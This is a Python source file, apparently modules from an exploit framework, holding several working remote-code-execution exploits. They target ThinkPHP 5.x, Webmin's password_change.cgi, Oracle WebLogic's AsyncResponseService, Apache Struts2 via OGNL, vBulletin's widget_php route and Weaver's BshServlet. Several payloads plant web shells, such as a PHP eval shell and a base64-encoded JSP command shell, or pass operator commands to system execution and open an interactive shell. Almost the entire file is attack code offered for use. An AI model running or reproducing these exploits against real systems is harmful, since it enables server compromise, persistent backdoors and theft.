def exploit(self):
url = self.get_options('url')
randomstr = self.randomstr()
vul_param = 'echo {}'.format(randomstr)
# <= 5.0.13
tp5013 = {
's': '{}'.format(vul_param),
'_method': '__construct',
'method': '',
'filter[]': 'system'
}
# 5.0.21-5.0.22
tp5022 = url + '/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=' + vul_param
# 5.0.23
tp5023 = {
'_method': '__construct',
'filter[]': 'system',
'method': 'get',
'server[REQUEST_METHOD]': '{}'.format(vul_param)
}
# 5.1.*
tp51 = url + '/?s=index/\\think\Request/input&filter=system&data=' + vul_param
explist = [tp5013, tp5022, tp5023, tp51]
for i in range(len(explist)):
if type(explist[i]) == dict:
res = HttpClient().send_request_cgi(method='POST',
url=url,
data=explist[i])
if res is not None:
if randomstr in res.text:
print_green('[+] Exploit succeed')
TakeControl(res).forward_shell(vul_param)
break
else:
print_red('[-] {0} {1}'.format(url, res.status_code))
print_white(res.text)
else:
res = HttpClient().send_request_cgi(method='GET',
url=explist[i])
if res is not None:
if randomstr in res.text:
print_green('[+] Exploit succeed')
TakeControl(res).forward_shell(vul_param)
break
else:
print_red('[-] {0} {1}'.format(url, res.status_code))
print_white(res.text)
print_blue('[*] Exploit completed')
def exploit(self):
url = self.get_options('url')
command = self.get_options('command')
vul_url = url + 'password_change.cgi'
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0',
'Cookie': 'redirect=1; testing=1; sid=x; sessiontest=1',
'Referer': '{}'.format(url + '/session_login.cgi')
}
payload = {
'user': '******',
'pam': '',
'expired': '2',
'old': 'test|{}'.format(command),
'new1': 'test2',
'new2': 'test2'
}
res = HttpClient().send_request_cgi(method='POST',
url=vul_url,
headers=headers,
data=payload)
if res is not None:
if res.status_code == 200:
print_white(res.text)
print_green('[+] Exploit succeed,{0}'.format(vul_url))
else:
print_red('[-] {0} {1}'.format(vul_url, res.status_code))
print_white(res.text)
print_blue('[*] Exploit completed')
return
def exploit(self):
url = self.get_options('url')
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0'
}
payload = '/index.php/?s=index/\\think\\template\\driver\\file/write&cacheFile=TH1NK.php&content=<?php @eval($_POST[1]);?>'
payload1 = '/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=TH1NK.php&vars[1][]=<?php @eval($_POST[1]);?>'
payload2 = '/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'<?php @eval($_POST[1]);?>\'>TH1NK.php'
payload3 = '/index.php/?s=index/\\think\\app/invokefunction&function=assert&vars[0]=eval($_POST[1])&vars[1][]=1'
explist = [payload, payload1, payload2, payload3]
for i in range(len(explist)):
vul_url = url + explist[i]
res = HttpClient().send_request_cgi(method='GET',
url=vul_url,
headers=headers,
params=payload)
if res is not None:
if res.status_code == 200:
print_green('[+] Exploit succeed,{0}'.format(vul_url))
break
else:
print_red('[-] {0} {1}'.format(url, res.status_code))
print_white(res.text)
print_blue('[*] Exploit completed')
def exploit(self):
vul_url = self.get_options('url') + '/_async/AsyncResponseService'
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Content-Type': 'text/xml',
'Content-Length': '2163',
'cache-control': 'no-cache'
}
payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo IDwlQCBwYWdlIGltcG9ydD0iamF2YS51dGlsLiosamF2YS5pby4qIiU+CjwlCiU+CjxIVE1MPjxCT0RZPgpDb21tYW5kcyB3aXRoIEpTUAo8Rk9STSBNRVRIT0Q9IkdFVCIgTkFNRT0ibXlmb3JtIiBBQ1RJT049IiI+CjxJTlBVVCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZCI+CjwvRk9STT4KPHByZT4KPCUKaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKSB7CiAgICBvdXQucHJpbnRsbigiQ29tbWFuZDogIiArIHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSArICI8QlI+Iik7CiAgICBQcm9jZXNzIHA7CiAgICBpZiAoIFN5c3RlbS5nZXRQcm9wZXJ0eSgib3MubmFtZSIpLnRvTG93ZXJDYXNlKCkuaW5kZXhPZigid2luZG93cyIpICE9IC0xKXsKICAgICAgICBwID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiY21kLmV4ZSAvQyAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIGVsc2V7CiAgICAgICAgcCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7CiAgICBJbnB1dFN0cmVhbSBpbiA9IHAuZ2V0SW5wdXRTdHJlYW0oKTsKICAgIERhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKICAgIFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7CiAgICB3aGlsZSAoIGRpc3IgIT0gbnVsbCApIHsKICAgIG91dC5wcmludGxuKGRpc3IpOwogICAgZGlzciA9IGRpcy5yZWFkTGluZSgpOwogICAgfQp9CiU+CjwvcHJlPgo8L0JPRFk+PC9IVE1MPiAKCg== |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/1.jsp</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'''
res = HttpClient().send_request_cgi(method='POST',
url=vul_url,
headers=headers,
data=payload)
shell = self.get_options('url') + '/bea_wls_internal/1.jsp'
if res is not None:
shell_res = HttpClient().send_request_cgi(method='GET', url=shell)
if shell_res.status_code == 200:
print_green('[+] Exploit succeed,{0}'.format(shell))
else:
print_red('[-] {0} {1}'.format(vul_url, res.status_code))
print_white(res.text)
print_blue('[*] Exploit completed')
def exploit(self):
url = self.get_options('url')
command = self.get_options('command')
payload = quote('''${
(#[email protected]@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec('%s')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
''' % command)
vul_url = url + '/struts2-showcase/' + payload + '/actionChain1.action'
res = HttpClient().send_request_cgi(method='GET', url=vul_url)
if res is not None:
if res.status_code == 302:
req = re.findall('/struts2-showcase/(.*?)/register2.action', str(res.headers))
print_green('[+] Exploit succeed, ' + str(req))
print_blue('[*] Exploit completed')
else:
print_red('[-] {0} {1}'.format(vul_url, res.status_code))
print_white(res.text)
print_blue('[*] Exploit completed')
def exploit(self):
url = self.get_options('url')
command = self.get_options('command')
# code = self.get_options('code')
payload = '''routestring=ajax/render/widget_php&widgetConfig[code]=echo shell_exec('{0}')'''.format(
command)
print_blue('[*] {0}'.format(url))
res = HttpClient().send_request_cgi(method='POST',
url=url,
data=payload)
if res is not None:
if res.status_code == 200:
print_green(res.text)
print_green('[+] Exploit succeed')
else:
print_red('[-] {0} {1}'.format(url, res.status_code))
print_white(res.text)
print_blue('[*] Exploit completed')
def exploit(self):
url = self.get_options('url')
command = self.get_options('command')
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0'
}
payload = '''bsh.script=eval%00("ex"%2b"ec(\"{0}\")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'
'''.format(command)
vul_url = url + '/weaver/bsh.servlet.BshServlet'
print_blue('[*] {0}'.format(vul_url))
res = HttpClient().send_request_cgi(method='POST',
url=vul_url,
headers=headers,
data=payload)
if res is not None:
if res.status_code == 200:
print_green(res.text)
print_green('[+] Exploit succeed')
else:
print_red('[-] {0} {1}'.format(vul_url, res.status_code))
print_white(res.text)
print_blue('[*] Exploit completed')